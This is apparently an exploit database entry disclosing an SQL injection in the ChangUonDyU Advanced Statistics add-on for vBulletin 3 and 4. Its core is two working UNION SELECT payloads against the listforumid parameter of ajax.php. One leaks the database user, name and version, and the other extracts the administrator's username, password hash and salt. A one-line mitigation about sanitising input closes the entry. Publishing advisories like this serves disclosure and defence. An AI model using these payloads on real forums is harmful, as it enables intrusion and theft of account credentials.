vendor:
ChangUonDyU Advanced Statistics
by:
Juno_okyo
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ChangUonDyU Advanced Statistics
Affected Version From: vBulletin 3
Affected Version To: vBulletin 4
Patch Exists: YES
Related CWE: http://www.vbulletin.com/
CPE: a:vbulletin:vbulletin
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2012
vBulletin ChangUonDyU Advanced Statistics – SQL Injection
SQL Injection was found in ChangUonDyU Advanced Statistics. Query on ajax.php. Exploitation: ajax.php?do=inforum&listforumid=100) UNION SELECT 1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20 or: ajax.php?do=inforum&listforumid=100) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user where userid=1-- -&result=20
Mitigation:
Ensure that user input is properly sanitized and validated before being used in a SQL query.